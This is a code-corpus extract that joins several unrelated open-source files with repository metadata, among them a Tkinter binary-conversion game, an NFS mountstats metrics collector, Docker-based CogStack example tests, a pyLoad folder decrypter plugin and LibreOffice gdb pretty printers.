self.parent.title("Convert to Binary") # Sets the window title.
self.parent.geometry("200x300+400+150") # Sets the window size (200x300), as well as its position (numbers preceded by plus signs).
# Canvas upon which to output the answer chain.
self.canAnswers = Tkinter.Canvas(self.parent, bg = "#EEEEEE")
self.canAnswers.place(bordermode = "outside", x = 5, y = 5, width = 190, height = 190)
# Label to visually idenitfy the error counter.
self.lblErrorsTag = Tkinter.Label(self.parent, anchor = "w", text = "Errors:")
self.lblErrorsTag.place(bordermode = "outside", x = 5, y = 200, width = 145, height = 25)
# The error counter itself. It's a label, so requires a StringVar to be assigned to the widget's 'textvariable' property.
# It's awkward like that.
self.error_value = Tkinter.StringVar()
self.error_value.set(str(self.error_count))
self.lblErrors = Tkinter.Label(self.parent, anchor = "w", textvariable = self.error_value)
self.lblErrors.place(bordermode = "outside", x = 155, y = 200, width = 40, height = 25)
# Label to hold the last correct answer. Saves some confusion by having it right next to the answer entry boxes.
self.last_answer_value = Tkinter.StringVar()
self.last_answer_value.set(str(self.progress))
self.lblLastAnswer = Tkinter.Label(self.parent, anchor = "w", textvariable = self.last_answer_value)
self.lblLastAnswer.place(bordermode = "outside", x = 5, y = 230, width = 60, height = 25)
# Entry box to accept the answer rounded down to the neared whole.
self.entAnswer = Tkinter.Entry(self.parent, justify = "center")
self.entAnswer.place(bordermode = "outside", x = 70, y = 230, width = 105, height = 25)
# Entry box to accept the remainder left after working out the answer.
self.entRemainder = Tkinter.Entry(self.parent, justify = "center")
self.entRemainder.place(bordermode = "outside", x = 175, y = 230, width = 20, height = 25)
# A big ol' button to submit the player's answer.
self.btnSubmit = Tkinter.Button(self.parent, text = "Submit", command = self.submit_answer)
self.btnSubmit.place(bordermode = "outside", x = 5, y = 260, width = 190, height = 35)
def submit_answer(self):
# Try to extract the answer and remainder from the entry boxes. If neither can be converted to an integer,
# increase the error counter by 1.
try:
self.answer = int(self.entAnswer.get())
self.remainder = int(self.entRemainder.get())
# If both values are correct, add it to the answer chain.
# Otherwise, an error for you, player.
if self.answer == half_number(self.progress) and self.remainder == get_remainder(self.progress):
self.remainder = get_remainder(self.progress)
self.progress = half_number(self.progress)
self.answer_chain.append(self.canAnswers.create_text(0,12 * len(self.answer_chain), anchor = "nw", text = str(self.progress) + " r" + str(self.remainder)))
else:
self.error_count += 1
except ValueError:
self.error_count += 1
# Update the error counter and the current value to be dividing. Also clear the entry boxes.
self.error_value.set(str(self.error_count))
self.last_answer_value.set(str(self.progress))
self.entAnswer.delete(0, "end")
self.entRemainder.delete(0, "end")
# If the player has reached 0, it's time to bring forth the binary entry form.
if self.progress == 0:
binary_entry(self.forms, self.apps)
class EnterBinary():
def __init__ (self, forms, apps):
self.forms = forms
self.apps = apps
self.parent = forms["binary"] # binary being the parent form for every widget here.
self.apps["game"] = apps["game"]
self.final_binary = bin(apps["game"].number) # The final binary value representing the number.
self.binary_answer = "" # The player's attempt at entering the binary value.
self.init_ui()
def init_ui(self):
self.parent.title("Enter binary")
self.parent.geometry("300x35+400+150")
# The entry box for the player's binary answer. The player needs to look back on their answers and enter all
# of the remainders from the last one up to the first.
self.entBinary = Tkinter.Entry(self.parent, justify = "center")
self.entBinary.place(bordermode = "outside", x = 5, y = 5, width = 195, height = 25)
# Button that does what it says on the tin: submits the answer.
self.btnSubmit = Tkinter.Button(self.parent, text = "Submit", command = self.submit_answer)
self.btnSubmit.place(bordermode = "outside", x = 205, y = 5, width = 90, height = 25)
def submit_answer(self):
# Take the player's answer from the entry box and precede it with "0b" so that it can be easily compared
# with the correct answer.
self.binary_answer = "0b" + self.entBinary.get()
# If the answer's correct, call the scorecard window.
# Otherwise, increase the error counter by 1 and update the main window accordingly.
if self.binary_answer == self.final_binary:
scorecard(self.forms,self.apps)
else:
self.apps["game"].error_count += 1
self.apps["game"].error_value.set(str(self.apps["game"].error_count))
class FinalScore():
def __init__ (self, forms, apps):
self.forms = forms
self.apps = apps
self.parent = forms["scorecard"] # scorecard is the parent for all widgets in this class.
self.error_count = apps["game"].error_count # Pass the error counter to one local to this window.
self.grade = grade(self.error_count) # Obtain a grade based on the number of errors made by the player.
# Get rid of the root and binary forms. They are no longer needed.
forms["root"].destroy()
del(apps["game"])
forms["binary"].destroy()
del(apps["binary"])
self.init_ui()
def init_ui(self):
self.parent.title("Scorecard")
self.parent.geometry("300x100+400+150")
# Label to show the player's error count, and the grade determined from that number.
self.lblScore = Tkinter.Label(self.parent, anchor = "center", text = "Errors made:\n" + str(self.error_count) + "\nYour grade:\n" + self.grade)
self.lblScore.place(bordermode = "outside", x = 5, y = 5, width = 290, height = 60)
# Button to play again.
self.btnPlayAgain = Tkinter.Button(self.parent, text = "Play again", command = self.play_again)
self.btnPlayAgain.place(bordermode = "outside", x = 5, y = 70, width = 140, height = 25)
# Button to quit.
self.btnQuit = Tkinter.Button(self.parent, text = "Exit", command = self.quit_game)
self.btnQuit.place(bordermode = "outside", x = 155, y = 70, width = 140, height = 25)
# Destroys the window and deletes this object, effectively ending the program.
def quit_game(self):
self.parent.destroy()
del(self)
# Destroys this window and spawns a new game window.
def play_again(self):
self.parent.destroy()
main()
del(self)
def main():
# Create dictionaries to store all the forms and widget classes. It's easier to pass a whole dict than it is to pass each individual form.
# Cleaner too.
forms = {}
apps = {}
forms["root"] = Tkinter.Tk() # Create a new window and assign it to the entry 'root' in the dict.
apps["game"] = GameMain(forms, apps) # Create an object based on the GameMain class, which will create all the needed widgets and variables.
forms["root"].mainloop() # Commence the event-loop.
def binary_entry(forms, apps):
forms["binary"] = Tkinter.Tk()
apps["binary"] = EnterBinary(forms, apps)
forms["binary"].mainloop()
def scorecard(forms, apps):
forms["scorecard"] = Tkinter.Tk()
apps["scorecard"] = FinalScore(forms, apps)
forms["scorecard"].mainloop()
|
gpl-2.0
| -3,188,199,944,839,545,000
| 45.57561
| 159
| 0.700566
| false
| 3.357243
| false
| false
| false
|
ApptuitAI/xcollector
|
collectors/0/mountstats.py
|
1
|
11150
|
#!/usr/bin/env python
# This file is part of tcollector.
# Copyright (C) 2013 The tcollector Authors.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty
# of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser
# General Public License for more details. You should have received a copy
# of the GNU Lesser General Public License along with this program. If not,
# see <http://www.gnu.org/licenses/>.
#
"""mountstats.py Tcollector
#
# This script pull NFS mountstats data, dedupes it by mount point and puts it into the following namespaces:
#
# proc.mountstats.<rpccall>.<metric> nfshost=<nfsserver> nfsvol=<nfsvolume>
# # Note that if subdirectories of nfsvol are mounted, but the 'events' line of /proc/self/mountstats is
# identical, then the metrics will be deduped, and the first alphabetic volume name will be used
# proc.mountstats.bytes.<metric> 1464196613 41494104 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# # Taken from the 'bytes:' line in /proc/self/mountstats
# # each <metric> represents one field on the line
#
# See https://utcc.utoronto.ca/~cks/space/blog/linux/NFSMountstatsIndex
# and https://utcc.utoronto.ca/~cks/space/blog/linux/NFSMountstatsNFSOps
# for a great example of the data available in /proc/self/mountstats
#
# Example output:
# proc.mountstats.getattr.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.normalread 1464196613 41494104 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.normalwrite 1464196613 10145341022 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.directread 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.directwrite 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.serverread 1464196613 8413526 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.serverwrite 1464196613 10145494716 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.readpages 1464196613 2157 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.writepages 1464196613 2477054 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
"""
import sys
import time
import hashlib
COLLECTION_INTERVAL = 10 # seconds
# BYTES_FIELDS is individual fields in the 'bytes: ' line
BYTES_FIELDS = ['normalread', 'normalwrite', 'directread', 'directwrite', 'serverread', 'serverwrite', 'readpages',
'writepages']
# KEY_METRICS contains the RPC call metrics we want specific data for
KEY_METRICS = ['GETATTR', 'ACCESS', 'READ', 'WRITE']
# OTHER_METRICS contains the other RPC call we will aggregate as 'OTHER'
OTHER_METRICS = ['SETATTR', 'LOOKUP', 'READLINK', 'CREATE', 'MKDIR', 'SYMLINK', 'MKNOD', 'REMOVE', 'RMDIR', 'RENAME',
'LINK', 'READDIR', 'READDIRPLUS', 'FSSTAT', 'FSINFO', 'PATHCONF', 'COMMIT']
# RPC_FIELDS is the individual metric fields on the RPC metric lines
RPC_FIELDS = ['ops', 'txs', 'timeouts', 'txbytes', 'rxbytes', 'qtime', 'rttime', 'totaltime']
def main():
"""nfsstats main loop."""
try:
f_nfsstats = open("/proc/self/mountstats", "r")
except:
sys.exit(13)
while True:
device = None
f_nfsstats.seek(0)
ts = int(time.time())
rpc_metrics = {}
for line in f_nfsstats:
values = line.split(None)
if len(values) == 0:
continue
if len(values) >= 8 and values[0] == 'device':
if values[7] == 'nfs':
dupe = False
hostname, mount = values[1].split(':')
mountpoint = values[4]
mount = mount.rstrip("/")
device = hostname + mount + mountpoint
rpc_metrics[device] = {}
rpc_metrics[device]['other'] = dict((x, 0) for x in RPC_FIELDS)
rpc_metrics[device]['nfshost'] = hostname
rpc_metrics[device]['nfsvol'] = mount
rpc_metrics[device]['mounts'] = [mount]
for metric in KEY_METRICS:
rpc_metrics[device][metric] = dict((x, 0) for x in RPC_FIELDS)
if device == None:
continue
if dupe == True:
continue
field = values[0].rstrip(":")
# Use events as a deduping key for multiple mounts of the same volume
# ( If multiple subdirectories of the same volume are mounted to different places they
# will show up in mountstats, but will have duplicate data. )
if field == "events":
digester = hashlib.md5()
digester.update(line)
m = digester.digest()
rpc_metrics[device]['digest'] = m
if m in rpc_metrics:
# metrics already counted, mark as dupe ignore
dupe = True
first_device = rpc_metrics[m]
rpc_metrics[first_device]['mounts'].append(mount)
rpc_metrics[device]['dupe'] = True
else:
rpc_metrics[m] = device
if field == "bytes":
rpc_metrics[device]['bytes'] = dict(
(BYTES_FIELDS[i], values[i + 1]) for i in range(0, len(BYTES_FIELDS)))
if field in KEY_METRICS:
for i in range(1, len(RPC_FIELDS) + 1):
metric = field
rpc_metrics[device][metric][RPC_FIELDS[i - 1]] += int(values[i])
if field in OTHER_METRICS:
for i in range(1, len(RPC_FIELDS) + 1):
rpc_metrics[device]['other'][RPC_FIELDS[i - 1]] += int(values[i])
for device in rpc_metrics:
# Skip the duplicates
if 'dupe' in rpc_metrics[device]:
continue
# Skip the digest only entries (they wont have a referenct to the digest)
if 'digest' not in rpc_metrics[device]:
continue
nfshost = rpc_metrics[device]['nfshost']
rpc_metrics[device]['mounts'].sort()
nfsvol = rpc_metrics[device]['mounts'][0]
for metric in KEY_METRICS + ['other']:
for field in rpc_metrics[device][metric]:
print("proc.mountstats.%s.%s %d %s nfshost=%s nfsvol=%s" % (metric.lower(), field.lower(), ts, rpc_metrics[device][metric][field], nfshost, nfsvol))
for field in BYTES_FIELDS:
print("proc.mountstats.bytes.%s %d %s nfshost=%s nfsvol=%s" % (field.lower(), ts, rpc_metrics[device]['bytes'][field], nfshost, nfsvol))
sys.stdout.flush()
time.sleep(COLLECTION_INTERVAL)
if __name__ == "__main__":
main()
|
lgpl-3.0
| -7,301,741,734,256,473,000
| 57.376963
| 168
| 0.688969
| false
| 3.017591
| false
| false
| false
|
CogStack/cogstack
|
test/examples/examples_common.py
|
1
|
13905
|
#!/usr/bin/python
import unittest
import os
import logging
import subprocess
import time
import yaml
from connectors import *
class TestSingleExample(unittest.TestCase):
"""
A common base class for the examples test cases
"""
def __init__(self,
example_path,
sub_case="",
use_local_image_build=True,
image_build_rel_dir="../../../",
*args, **kwargs):
"""
:param example_path: the absolute patch to the examples main directory
:param sub_case: the specific sub case to test
:param use_local_image_build: whether to use a locally build CogStack Pipeline image
:param image_build_rel_dir: the relative directory where the image Dockerfile is located
:param args: any additional arguments passed on to the parent class
:param kwargs: any additional arguments passed on to the parent class
"""
super(TestSingleExample, self).__init__(*args, **kwargs)
# set paths and directories info
self.example_path = example_path
self.sub_case = sub_case
self.deploy_dir = '__deploy'
self.use_local_image_build = use_local_image_build
self.image_build_rel_dir = image_build_rel_dir
self.deploy_path = os.path.join(self.example_path, self.deploy_dir)
if len(self.sub_case) > 0:
self.deploy_path = os.path.join(self.deploy_path, self.sub_case)
self.image_build_rel_dir += "../"
# set commands
self.setup_cmd = 'bash setup.sh'
self.docker_cmd_up = 'docker-compose up -d' # --detach
self.docker_cmd_down = 'docker-compose down -v' # --volumes
# set up logger
log_format = '[%(asctime)s] [%(levelname)s] %(name)s: %(message)s'
logging.basicConfig(format=log_format, level=logging.INFO)
self.log = logging.getLogger(self.__class__.__name__)
@staticmethod
def getRecordsCountFromTargetDb(connector, table_name):
"""
Queries the table for the number of records
in the database specified by the connector
:param connector: the database connector :class:~JdbcConnector
:param table_name: the name of the table to query
:return: the number of records
"""
cursor = connector.cursor()
cursor.execute("SELECT COUNT(*) FROM %s" % table_name)
res = cursor.fetchall()
# res is a list of tuples
return int(res[0][0])
@staticmethod
def getRecordsCountFromTargetEs(connector, index_name):
"""
Queries the index for the number of documents (_count)
:param connector: the ElasticSearch connector :class:~ElasticSearchConnector
:param index_name: the name of the index to query
:return: the number of records
"""
res = connector.count(index_name)
return int(res['count'])
@staticmethod
def waitForTargetEsReady(connector, index_name, max_timeout_s=300):
"""
Queries the index for the number of documents until no new arrive
:param connector: the ElasticSearch connector :class:~ElasticSearchConnector
:param index_name: the name of the index to query
:param max_timeout_s: maximum timeout [in s]
"""
start_time_s = time.time()
query_delay_s = 3
# wait for index
while True:
try:
index_exists = connector.indices.exists(index=index_name)
if index_exists or int(time.time() - start_time_s) > max_timeout_s:
break
except Exception as e:
logging.warn('Exception while querying index: %s' % e)
pass
time.sleep(query_delay_s)
min_count_wo_changes = 3
cur_count_wo_changes = 0
last_records_count = 0
# wait for documents
while cur_count_wo_changes < min_count_wo_changes:
recs = TestSingleExample.getRecordsCountFromTargetEs(connector, index_name)
if recs > 0:
if recs == last_records_count:
cur_count_wo_changes += 1
else:
last_records_count = recs
cur_count_wo_changes = 0
if cur_count_wo_changes > min_count_wo_changes or int(time.time() - start_time_s) > max_timeout_s:
break
time.sleep(query_delay_s)
@staticmethod
def waitForTargetDbReady(connector, table_name, max_timeout_s=300):
"""
Queries the table for the number of records until no new arrive
:param connector: the JDBC connector :class:~JdbcConnector
:param table_name: the name of the table to query
:param max_timeout_s: maximum timeout [in s]
"""
start_time_s = time.time()
query_delay_s = 3
min_count_wo_changes = 3
cur_count_wo_changes = 0
last_records_count = 0
# wait for records
while cur_count_wo_changes < min_count_wo_changes:
recs = TestSingleExample.getRecordsCountFromTargetDb(connector, table_name)
if recs > 0:
if recs == last_records_count:
cur_count_wo_changes += 1
else:
last_records_count = recs
cur_count_wo_changes = 0
if cur_count_wo_changes > min_count_wo_changes or int(time.time() - start_time_s) > max_timeout_s:
break
time.sleep(query_delay_s)
def addBuildContextInComposeFile(self):
"""
Add the build context key in the Docker Compose file
to be using a locally build image
"""
compose_file = os.path.join(self.deploy_path, "docker-compose.override.yml")
with open(compose_file, 'r') as c_file:
compose_yaml = yaml.safe_load(c_file)
# check whether the service key exists and add the build context
if 'cogstack-pipeline' not in compose_yaml['services']:
compose_yaml['services']['cogstack-pipeline'] = dict()
compose_yaml['services']['cogstack-pipeline']['build'] = self.image_build_rel_dir
# save the file in-place
with open(compose_file, 'w') as c_file:
yaml.dump(compose_yaml, c_file, default_flow_style=False)
def setUp(self):
"""
Runs test case set up function
"""
# run setup for the example
self.log.info("Setting up ...")
try:
out = subprocess.check_output(self.setup_cmd, cwd=self.example_path, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
self.log.error("Failed to setup example: %s" % e)
if hasattr(e, 'output'):
self.log.error("Output: %s" % e.output)
self.fail(e.message)
# replace the image to local build
if self.use_local_image_build:
try:
self.addBuildContextInComposeFile()
except Exception as e:
self.log.error("Failed to add the local build context: %s" % e)
self.fail(e.message)
# run docker-compose
self.log.info("Starting the services ...")
try:
out = subprocess.check_output(self.docker_cmd_up, cwd=self.deploy_path, stderr=subprocess.STDOUT, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
# clean up
try:
out = subprocess.check_output(self.docker_cmd_down, stderr=subprocess.STDOUT, cwd=self.deploy_path, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as ee:
self.log.warn("Failed to stop services: %s" % ee)
self.log.error("Failed to start services: %s" % e)
self.fail(e.message)
def tearDown(self):
""""
Runs test case tear down function
"""
# run docker-compose
self.log.info("Stopping the services ...")
try:
out = subprocess.check_output(self.docker_cmd_down, cwd=self.deploy_path, stderr=subprocess.STDOUT, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
self.log.warn("Failed to stop services: %s " % e)
# clean up the directory
self.log.info("Cleaning up ...")
main_deploy_path = os.path.join(self.example_path, self.deploy_dir)
try:
out = subprocess.check_output('rm -rf %s' % main_deploy_path, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
self.log.warn("Failed to clean up: %s" % e)
class TestSingleExampleDb2Es(TestSingleExample):
"""
A common base class for examples reading the records from a single database source
and storing them in ElasticSearch sink
"""
def __init__(self, source_conn_conf, source_table_name, es_conn_conf, es_index_name,
wait_for_source_ready_s=10,
wait_for_sink_ready_max_s=600,
*args, **kwargs):
"""
:param source_conn_conf: the source JDBC connector configuration :class:~JdbcConnectorConfig
:param source_table_name: the source database table name
:param es_conn_conf: the sink ElasticSearch connector configuration :class:~ElasticConnectorConfig
:param es_index_name: the sink ElasticSearch index name
:param wait_for_source_ready_s: delay [in s] to wait until source is ready to query
:param wait_for_sink_ready_s: delay [in s] to wait until the sink (and data) becomes ready to query
:param args: any additional arguments passed on to the parent class
:param kwargs: any additional arguments passed on to the parent class
"""
super(TestSingleExampleDb2Es, self).__init__(*args, **kwargs)
self.source_conn_conf = source_conn_conf
self.source_table_name = source_table_name
self.es_conn_conf = es_conn_conf
self.es_index_name = es_index_name
self.wait_for_souce_ready_s = wait_for_source_ready_s
self.wait_for_sink_ready_max_s = wait_for_sink_ready_max_s
def test_source_sink_mapping(self):
""""
Runs a simple test verifying the number of records in the source and the sink
"""
# wait here until DBs become ready
self.log.info("Waiting for source/sink to become ready ...")
time.sleep(self.wait_for_souce_ready_s)
source_conn = JdbcConnector(self.source_conn_conf)
es_conn = ElasticConnector(self.es_conn_conf)
# wait here until ES becomes ready
self.log.info("Waiting for cogstack pipeline to process records ...")
#time.sleep(self.wait_for_sink_ready_max_s)
self.waitForTargetEsReady(es_conn.connector, self.es_index_name, self.wait_for_sink_ready_max_s)
recs_in = self.getRecordsCountFromTargetDb(source_conn.connector, self.source_table_name)
recs_out = self.getRecordsCountFromTargetEs(es_conn.connector, self.es_index_name)
self.assertEqual(recs_in, recs_out, "Records counts differ between source (%s) and sink (%s)." % (recs_in, recs_out))
class TestSingleExampleDb2Db(TestSingleExample):
"""
A common base class for examples reading the records from a single database source
and storing them in the same or another database sink
"""
def __init__(self, source_conn_conf, source_table_name, sink_conn_conf, sink_table_name,
wait_for_source_ready_s=10,
wait_for_sink_ready_max_s=600,
*args, **kwargs):
"""
:param source_conn_conf: the source JDBC connector configuration :class:~JdbcConnectorConfig
:param source_table_name: the source database table name
:param sink_conn_conf: the sink JDBC connector configuration :class:~JdbcConnectorConfig
:param sink_table_name: the sink database table name
:param wait_for_source_ready_s: delay [in s] to wait until source is ready to query
:param wait_for_sink_ready_s: delay [in s] to wait until the sink (and data) becomes ready to query
:param args: any additional arguments passed on to the parent class
:param kwargs: any additional arguments passed on to the parent class
"""
super(TestSingleExampleDb2Db, self).__init__(*args, **kwargs)
self.source_conn_conf = source_conn_conf
self.source_table_name = source_table_name
self.sink_conn_conf = sink_conn_conf
self.sink_table_name = sink_table_name
self.wait_for_souce_ready_s = wait_for_source_ready_s
self.wait_for_sink_ready_max_s = wait_for_sink_ready_max_s
def test_source_sink_mapping(self):
""""
Runs a simple test verifying the number of records in the source and the sink
"""
# wait here until DBs become ready
self.log.info("Waiting for source/sink to become ready ...")
time.sleep(self.wait_for_souce_ready_s)
source_conn = JdbcConnector(self.source_conn_conf)
sink_conn = JdbcConnector(self.sink_conn_conf)
# wait here until sink becomes ready
self.log.info("Waiting for cogstack pipeline to process records ...")
self.waitForTargetDbReady(sink_conn.connector, self.sink_table_name, self.wait_for_sink_ready_max_s)
recs_in = self.getRecordsCountFromTargetDb(source_conn.connector, self.source_table_name)
recs_out = self.getRecordsCountFromTargetDb(sink_conn.connector, self.sink_table_name)
self.assertEqual(recs_in, recs_out, "Records counts differ between source (%s) and sink (%s)." % (recs_in, recs_out))
|
apache-2.0
| 2,910,151,856,740,945,400
| 40.88253
| 127
| 0.611363
| false
| 3.916901
| true
| false
| false
|
rlindner81/pyload
|
module/plugins/crypter/FreakhareComFolder.py
|
1
|
1784
|
# -*- coding: utf-8 -*-
import re
from module.plugins.internal.SimpleCrypter import SimpleCrypter
class FreakhareComFolder(SimpleCrypter):
__name__ = "FreakhareComFolder"
__type__ = "crypter"
__version__ = "0.08"
__status__ = "testing"
__pattern__ = r'http://(?:www\.)?freakshare\.com/folder/.+'
__config__ = [("activated", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
("folder_per_package", "Default;Yes;No",
"Create folder for each package", "Default"),
("max_wait", "int", "Reconnect if waiting time is greater than minutes", 10)]
__description__ = """Freakhare.com folder decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [("stickell", "l.stickell@yahoo.it")]
LINK_PATTERN = r'<a href="(http://freakshare\.com/files/.+?)" target="_blank">'
NAME_PATTERN = r'Folder:</b> (?P<N>.+)'
PAGES_PATTERN = r'Pages: +(\d+)'
def load_page(self, page_n):
if not hasattr(self, 'f_id') and not hasattr(self, 'f_md5'):
m = re.search(
r'http://freakshare.com/\?x=folder&f_id=(\d+)&f_md5=(\w+)',
self.data)
if m is not None:
self.f_id = m.group(1)
self.f_md5 = m.group(2)
return self.load('http://freakshare.com/', get={'x': 'folder',
'f_id': self.f_id,
'f_md5': self.f_md5,
'entrys': '20',
'page': page_n - 1,
'order': ''})
|
gpl-3.0
| 5,220,101,632,335,312,000
| 41.47619
| 95
| 0.453475
| false
| 3.693582
| false
| false
| false
|
beppec56/core
|
solenv/gdb/libreoffice/writerfilter.py
|
5
|
2749
|
# -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-
#
# This file is part of the LibreOffice project.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
from libreoffice.util import printing
class OOXMLPropertySetPrinter(object):
'''Prints writerfilter::ooxml::OOXMLPropertySet'''
def __init__(self, typename, value):
self.typename = typename
self.value = value
def to_string(self):
return "%s" % (self.typename)
def children(self):
children = [ ( 'properties', self.value['mProperties'] ) ]
return children.__iter__()
class OOXMLPropertyPrinter(object):
'''Prints writerfilter::ooxml::OOXMLProperty'''
def __init__(self, typename, value):
self.typename = typename
self.value = value
def to_string(self):
return "%s" % (self.typename)
def children(self):
children = [ ( 'id', self.value['mId'] ),
( 'type', self.value['meType'] ),
( 'value', self.value['mpValue'] ) ]
return children.__iter__()
class OOXMLPropertySetValuePrinter(object):
'''Prints writerfilter::ooxml::OOXMLPropertySetValue'''
def __init__(self, typename, value):
self.typename = typename
self.value = value
def to_string(self):
return "%s" % (self.typename)
class OOXMLStringValuePrinter(object):
'''Prints writerfilter::ooxml::OOXMLStringValue'''
def __init__(self, typename, value):
self.value = value
def to_string(self):
return "%s" % (self.value['mStr'])
class OOXMLIntegerValuePrinter(object):
'''Prints writerfilter::ooxml::OOXMLIntegerValue'''
def __init__(self, typename, value):
self.value = value
def to_string(self):
return "%d" % (self.value['mnValue'])
printer = None
def build_pretty_printers():
global printer
printer = printing.Printer("libreoffice/writerfilter")
printer.add('writerfilter::ooxml::OOXMLProperty', OOXMLPropertyPrinter)
printer.add('writerfilter::ooxml::OOXMLPropertySet', OOXMLPropertySetPrinter)
